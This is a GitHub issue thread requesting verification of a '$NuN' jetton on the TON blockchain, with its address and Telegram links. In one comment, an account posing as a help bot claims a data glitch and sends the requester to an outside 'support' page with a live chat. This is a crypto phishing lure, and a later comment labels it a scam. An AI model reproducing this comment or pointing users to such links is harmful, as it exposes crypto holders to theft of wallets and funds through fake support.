### ISSUE TITLE
Verification request for $NuN jetton on ton Blockchain 

### ISSUE THREAD

**Issue by Mresmaili514** [tonkeeper/ton-assets#1577]
name: NuN
description: **"Grace Through Devotion"**
address: 0:28c3de7fb29395a5998c120015ddcbac86a737266fbf5a2720aa6b494380494b
symbol: $NuN
Website: soon 🙏
  
social:
  - "https://t.me/NuN_ex"
  -"https://t.me/NuN_co"

**Comment by helpBot-cmyk** [comment]
> name: NuN description: **"Grace Through Devotion"** address: 0:28c3de7fb29395a5998c120015ddcbac86a737266fbf5a2720aa6b494380494b symbol: $NuN Website: soon 🙏
> 
> social:
> 
> * "https://t.me/NuN_ex"
>   -"https://t.me/NuN_co"

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Ton-Blockchain Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by Mitch1987y** [comment]
Its a scam 👉🏻 https://dappsrectification-chain.pages.dev/

**Comment by salateur** [comment]
Tonkeeper reserves the right to refuse verification without any explanation
